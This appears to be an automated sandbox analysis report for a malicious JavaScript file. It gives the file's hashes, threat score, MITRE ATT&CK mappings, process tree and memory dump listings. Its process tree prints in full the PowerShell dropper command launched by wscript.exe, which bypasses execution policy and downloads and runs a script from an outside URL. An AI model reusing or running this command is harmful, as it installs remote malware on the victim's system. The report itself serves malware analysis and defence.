7d273aa816e948999220ac2f30401a3aafd3a19029fa3633ff1ea2f0c50cc676

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
05-03-2024 02:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7d273aa816e948999220ac2f30401a3aafd3a19029fa3633ff1ea2f0c50cc676.js
Size

68KB
MD5

f881c6fcfb905a072881ab5226001823
SHA1

4aa8b84a1046e71b207ee1c55e5779e5bfccc7ee
SHA256

7d273aa816e948999220ac2f30401a3aafd3a19029fa3633ff1ea2f0c50cc676
SHA512

8f67446fb7c66606f5d771c1f239a07b09ebe65ecffb05f16e5b8353947f8912929606569d747060843df9d0d9ac9a0724e336345085124dcad64fbc9608d1a5
SSDEEP

1536:E7tsM18VEoS5Beww2mW21v7IOF3U88JCwJpxB3T/pyF5:2aVEoS5Beww2mW21vMOF3QJCwJpxB3Tk

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://compactgrill.hu/care.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2148	powershell.exe
4	2148	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2148	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2148	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2864 wrote to memory of 2148	2864	wscript.exe	28
PID 2864 wrote to memory of 2148	2864	wscript.exe	28
PID 2864 wrote to memory of 2148	2864	wscript.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\7d273aa816e948999220ac2f30401a3aafd3a19029fa3633ff1ea2f0c50cc676.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2864
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2148

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2148-4-0x000000001B620000-0x000000001B902000-memory.dmp

Filesize
2.9MB

Download
memory/2148-5-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2148-6-0x000007FEF59E0000-0x000007FEF637D000-memory.dmp

Filesize
9.6MB

Download
memory/2148-7-0x0000000002D30000-0x0000000002DB0000-memory.dmp

Filesize
512KB

Download
memory/2148-8-0x000007FEF59E0000-0x000007FEF637D000-memory.dmp

Filesize
9.6MB

Download
memory/2148-10-0x0000000002D30000-0x0000000002DB0000-memory.dmp

Filesize
512KB

Download
memory/2148-9-0x0000000002D30000-0x0000000002DB0000-memory.dmp

Filesize
512KB

Download
memory/2148-11-0x0000000002D30000-0x0000000002DB0000-memory.dmp

Filesize
512KB

Download
memory/2148-12-0x0000000002D30000-0x0000000002DB0000-memory.dmp

Filesize
512KB

Download
memory/2148-13-0x000007FEF59E0000-0x000007FEF637D000-memory.dmp

Filesize
9.6MB

Download